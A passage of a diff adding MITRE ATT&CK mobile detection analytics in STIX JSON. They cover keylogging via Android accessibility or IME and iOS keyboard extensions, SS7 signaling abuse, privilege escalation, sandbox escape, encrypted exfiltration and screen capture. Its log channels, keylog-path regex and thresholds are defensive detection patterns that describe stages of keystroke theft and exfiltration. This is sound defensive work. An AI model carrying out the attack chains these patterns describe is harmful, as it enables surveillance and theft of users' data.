+                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
+                            "name": "android:logcat",
+                            "channel": "Grant/enablement for BIND_ACCESSIBILITY_SERVICE or BIND_INPUT_METHOD for <pkg>"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "AccessibilityService connected|TYPE_VIEW_TEXT_CHANGED|TYPE_VIEW_FOCUSED events for other packages"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "android:logcat",
+                            "channel": "Default IME active imeId=<pkg>; frequent onStartInput/commitText calls"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE to /data/data/<pkg>/(files|databases)/(keys|inputs|clipboard).*\\\\.(db|sqlite|txt|log)"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Max time between intercept \u2192 persist/exfil (e.g., 5\u201345s)."
+                        },
+                        {
+                            "field": "MinKeyEventBurst",
+                            "description": "Minimum input events in window to flag (e.g., \u226510)."
+                        },
+                        {
+                            "field": "RequireA11yOrIME",
+                            "description": "Only alert when capability is via Accessibility or IME (true/false)."
+                        },
+                        {
+                            "field": "PersistPathRegex",
+                            "description": "Regex for keylog artifacts in app container."
+                        },
+                        {
+                            "field": "ExfilDomainAllowlist",
+                            "description": "Enterprise/analytics endpoints to suppress FPs."
+                        },
+                        {
+                            "field": "UserContext",
+                            "description": "Foreground/Work Profile/Kiosk to scope alerts."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.380000+00:00\", \"old_value\": \"2026-01-29 18:53:00.289000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--7f8717e8-fea8-42db-b60c-c64375630685",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.379000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0661#AN1752",
+                            "external_id": "AN1752"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1752",
+                    "description": "Defender correlates a custom keyboard extension activation (optionally with TCC \u2018Full Access\u2019) or abnormal UI text-entry interception with local keylog persistence and/or small egress. Chain: capability/consent (keyboard Full Access/TCC) \u2192 intercept (keyboard commit events or repeated secure text entry edits) \u2192 persist to container \u2192 near-term egress.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Keyboard extension Full Access change or related privacy grant for <bundle_id>"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Secure text entry focus and editingChanged bursts not typical for the app"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE of keylog artifacts (keys_*.txt, inputs.db) within app/keyboard container"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Max time from intercept \u2192 persist/exfil (e.g., 5\u201360s)."
+                        },
+                        {
+                            "field": "MinKeyEventBurst",
+                            "description": "Minimum keyboard commit or editingChanged events (e.g., \u226510)."
+                        },
+                        {
+                            "field": "KeyboardFullAccessRequired",
+                            "description": "Require Full Access to elevate severity (true/false)."
+                        },
+                        {
+                            "field": "PersistPathRegex",
+                            "description": "Regex for keylog artifacts under container paths."
+                        },
+                        {
+                            "field": "ExfilDomainAllowlist",
+                            "description": "Allowlisted enterprise/analytics endpoints."
+                        },
+                        {
+                            "field": "UserContext",
+                            "description": "Foreground state, Focus modes, MDM policy."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.379000+00:00\", \"old_value\": \"2026-01-29 19:12:28.428000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--b2120e89-a453-4575-8458-7700ea59f85a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0662#AN1753",
+                            "external_id": "AN1753"
+                        },
+                        {
+                            "source_name": "CSRIC5-WG10-FinalReport",
+                            "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017.",
+                            "url": "https://web.archive.org/web/20200330012714/https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1753",
+                    "description": "Defender observes anomalous signaling network queries targeting subscriber information associated with a device, including unexpected routing requests, location information exchanges, or node-origin inconsistencies indicative of SS7 signaling abuse. (Citation: CSRIC5-WG10-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "TelecomLogs:SS7Signaling",
+                            "channel": "Subscriber information queries, routing requests, or location update messages with anomalous node identifiers or unexpected origin patterns"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
+                            "name": "TelecomLogs:MobilityEvents",
+                            "channel": "Unexpected location resolution events or abnormal subscriber tracking requests"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "NodeIdentityDeviationThreshold",
+                            "description": "Defines acceptable variance for signaling node identifiers"
+                        },
+                        {
+                            "field": "SubscriberQueryFrequencyThreshold",
+                            "description": "Baseline-dependent threshold for excessive subscriber queries"
+                        },
+                        {
+                            "field": "GeographicRoutingDeviation",
+                            "description": "Expected signaling path vs observed routing anomalies"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-02-24 17:54:57.531000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--9bc8daed-e8ea-4c70-95bc-dcb2905b33d3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.380000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0662#AN1754",
+                            "external_id": "AN1754"
+                        },
+                        {
+                            "source_name": "CSRIC5-WG10-FinalReport",
+                            "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017.",
+                            "url": "https://web.archive.org/web/20200330012714/https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1754",
+                    "description": "Defender observes anomalous signaling interactions involving subscriber identity or location resolution events associated with a device, including abnormal routing requests, unexpected location information exchanges, or signaling node inconsistencies indicative of SS7 abuse. (Citation: CSRIC5-WG10-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "TelecomLogs:SS7Signaling",
+                            "channel": "Location resolution, routing, or subscriber information exchanges with anomalous signaling paths or node identities"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
+                            "name": "TelecomLogs:MobilityEvents",
+                            "channel": "Unexpected subscriber tracking or abnormal mobility/location resolution activity"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "LocationQueryAnomalyThreshold",
+                            "description": "Baseline deviation tolerance for location resolution events"
+                        },
+                        {
+                            "field": "SignalingPathDeviationThreshold",
+                            "description": "Expected vs observed signaling routing paths"
+                        },
+                        {
+                            "field": "SubscriberResolutionFrequency",
+                            "description": "Threshold for abnormal resolution or lookup behavior"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.380000+00:00\", \"old_value\": \"2026-02-24 17:56:26.375000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--ee4ce869-6b88-46f8-829a-9838f7607a8f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.383000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0663#AN1755",
+                            "external_id": "AN1755"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1755",
+                    "description": "Defender observes a mobile device initiating abnormal or exploit-like network interactions with internal or remote services, followed by process-level instability, privilege boundary shifts, or unexpected execution behaviors indicative of service exploitation outcomes.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Connections",
+                            "channel": "Outbound connections to internal enterprise services exhibiting anomalous protocol behavior, malformed sessions, or exploit-consistent traffic patterns"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
+                            "name": "AndroidLogs:Crash",
+                            "channel": "Application or system process crash/restart patterns temporally associated with remote service communications"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "ProtocolAnomalyThreshold",
+                            "description": "Defines deviation tolerance for malformed or exploit-like protocol behavior"
+                        },
+                        {
+                            "field": "CrashCorrelationWindow",
+                            "description": "Temporal linkage between suspicious network activity and process instability"
+                        },
+                        {
+                            "field": "EnterpriseServiceBaseline",
+                            "description": "Environment-specific baseline of expected internal service communications"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.383000+00:00\", \"old_value\": \"2026-02-23 17:50:48.706000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--6d2d8aff-7d23-40bc-bc29-54852baed5f1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0663#AN1756",
+                            "external_id": "AN1756"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1756",
+                    "description": "Defender observes a mobile device engaging remote or internal services with traffic characteristics inconsistent with normal application behavior, followed by execution anomalies, application instability, or security context deviations consistent with exploitation effects.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Connections",
+                            "channel": "Outbound connections to internal enterprise services exhibiting anomalous protocol behavior, malformed sessions, or exploit-consistent traffic patterns"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Application crash logs, watchdog terminations, or abnormal execution events associated with service communication"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TrafficDeviationThreshold",
+                            "description": "Defines acceptable protocol and payload variation"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-02-23 17:58:13.523000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--f463fae8-5697-4539-b6c7-e67aadf81c73",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.384000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0665#AN1758",
+                            "external_id": "AN1758"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1758",
+                    "description": "From the defender\u2019s perspective, this strategy correlates signals that a previously unprivileged Android app or process has gained higher privileges through exploitation rather than normal OS or MDM flows. \nObservable behaviors include: \n(1) unprivileged app processes issuing sensitive syscalls or accessing privileged device interfaces, \n(2) bursts of SELinux denials followed by an unexpected domain or permission change, \n(3) creation of new processes running with system or root UID whose lineage traces back to an app sandbox path, and \n(4) crashes or abnormal restarts of privileged system services followed shortly by a new connection or binder interaction from the same low-privileged app. The focus is on unusual privilege transitions, anomalous process ancestry, and OS security policy violations, not on specific exploit binaries or CVE signatures.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
+                            "name": "AndroidLogs:Crash",
+                            "channel": "Crash or abnormal restart of privileged system services (for example, system_server, mediaserver, installd) followed shortly by new privileged process activity or binder connections from a single app UID"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "AndroidLogs:Kernel",
+                            "channel": "Unprivileged app process (app UID, non-system) invoking sensitive syscalls or device interfaces associated with privilege escalation (setuid, ptrace, perf_event_open, vulnerable drivers)"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "AndroidLogs:Framework",
+                            "channel": "Creation of a new process running as system or root UID whose executable path resides under an app container path (for example, /data/app or /data/user/0/<pkg>), or whose parent process originates from an app sandbox"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window (for example, 60\u2013300 seconds) between SELinux events, crashes, and privilege changes to reduce noise while still capturing exploit chains."
+                        },
+                        {
+                            "field": "AppUidRange",
+                            "description": "UID ranges that represent unprivileged application accounts in a specific Android OEM or enterprise deployment."
+                        },
+                        {
+                            "field": "SensitiveSyscalls",
+                            "description": "List of syscalls considered indicative of privilege escalation attempts; may vary by kernel version, OEM drivers, and threat model."
+                        },
+                        {
+                            "field": "PrivilegedServices",
+                            "description": "Set of high-value Android system services where crashes or restarts are particularly suspicious (for example, system_server, mediaserver)."
+                        },
+                        {
+                            "field": "PrivilegedUids",
+                            "description": "Enterprise-defined mapping of UIDs considered elevated (for example, root, system, radio) for alert scoping."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.384000+00:00\", \"old_value\": \"2025-12-04 17:12:06.342000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--1076f33e-a959-49b8-97a3-2edf0360fae2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0665#AN1759",
+                            "external_id": "AN1759"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1759",
+                    "description": "Correlates app sandbox escape attempts via unsigned binary execution, mmap memory permission changes (RWX), and sandbox profile violations. Detection chain includes app leveraging JIT/JSC to execute shellcode or triggering kernel exploit via crafted IOKit or Mach port abuse.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
+                            "name": "iOS:unifiedlog",
+                            "channel": "code signature validation failure / exec of invalidly-signed payload from sandboxed app"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962",
+                            "name": "iOS:unifiedlog",
+                            "channel": "mmap with PROT_EXEC and PROT_WRITE by sandboxed app"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "ExecutableHashAllowList",
+                            "description": "Allowlist known benign unsigned binaries for reducing FP."
+                        },
+                        {
+                            "field": "RWXThreshold",
+                            "description": "Adjustable threshold for RWX page allocation frequency or size."
+                        },
+                        {
+                            "field": "JITContextDetection",
+                            "description": "May require tuning based on OS version and legitimate app usage (e.g., Safari JIT)."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-01-16 15:51:26.313000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--1f3c9114-ac86-4c1f-bb64-fb94d65ac78c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0667#AN1762",
+                            "external_id": "AN1762"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1762",
+                    "description": "An application generates, imports, or accesses asymmetric keypairs (e.g., RSA/ECC), uses a public key to encrypt outbound data or establish encrypted sessions, and transmits resulting ciphertext in structured communication patterns. Detection correlates keypair lifecycle activity + asymmetric crypto API usage + data transformation + background execution context + network transmission, especially when inconsistent with expected application functionality.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App invokes asymmetric cryptographic operations (e.g., RSA/ECC keypair generation OR public key encryption OR signature operations) on outbound data buffers"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Keypair generation, import, or access events (public/private key usage) occurring prior to network communication"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App writes asymmetric-encrypted blobs or encoded ciphertext to local buffers or files prior to transmission"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Asymmetric crypto operations occur while app_state=background OR device_locked=true OR no recent user interaction"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "App not in approved cryptographic or secure communication category performing keypair + encryption + transmission behavior"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between keypair usage and outbound communication"
+                        },
+                        {
+                            "field": "AllowedCryptoApps",
+                            "description": "Apps expected to use asymmetric cryptography (e.g., secure messaging, VPN, enterprise auth apps)"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether key generation/encryption should occur only during user interaction"
+                        },
+                        {
+                            "field": "KeyGenerationThreshold",
+                            "description": "Frequency of keypair generation/import events considered anomalous"
+                        },
+                        {
+                            "field": "PayloadSizeVariance",
+                            "description": "Expected variability in payload sizes due to asymmetric encryption overhead"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-04-06 15:51:25.896000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--4b4a369c-35aa-4389-a218-2034fb043041",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.377000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0667#AN1763",
+                            "external_id": "AN1763"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1763",
+                    "description": "Indirect evidence of asymmetric cryptographic channel usage inferred through key exchange-like network patterns and application background execution behavior, where direct observation of keypair operations is limited. Detection correlates app entitlement posture + background execution + asymmetric handshake patterns + subsequent encrypted communication.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between initial communication burst and steady encrypted traffic"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Apps expected to perform asymmetric key exchanges"
+                        },
+                        {
+                            "field": "HandshakePatternThreshold",
+                            "description": "Threshold for identifying asymmetric handshake-like traffic patterns"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether communication establishment should occur during user interaction"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.377000+00:00\", \"old_value\": \"2026-04-06 15:53:14.197000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--427fe5c7-1b91-4d71-ae2c-6840d128f0bd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.377000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0668#AN1764",
+                            "external_id": "AN1764"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1764",
+                    "description": "The defender correlates Android screen-capture-capable behavior from an app identity with runtime context showing that foreground content from another app is being captured outside expected user-driven workflows. The strongest Android evidence is MediaProjection-like capture initiation, accessibility-assisted observation of foreground UI content, or privileged screencap or screenrecord behavior, followed by screenshot or video artifact creation, buffer growth, or outbound transfer. The detection is strengthened when the capturing app is backgrounded, operates as a foreground service without clear user-driven recording intent, captures while another sensitive app is foregrounded, runs with accessibility or elevated access inconsistent with its role, or performs capture without recent user interaction.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "MediaProjection-style screen capture session began from app identity while a different app was foregrounded and capture path was not mapped to approved recording workflow"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Accessibility-service activity from app identity coincided with foreground content observation and subsequent screenshot, frame buffer, or screenrecord artifact behavior within TimeWindow"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Privileged screencap, screenrecord, adb-driven capture, or root-context screen acquisition behavior occurred from app, shell, or elevated identity while foreground app context changed or sensitive app remained active"
+                        },
+                        {
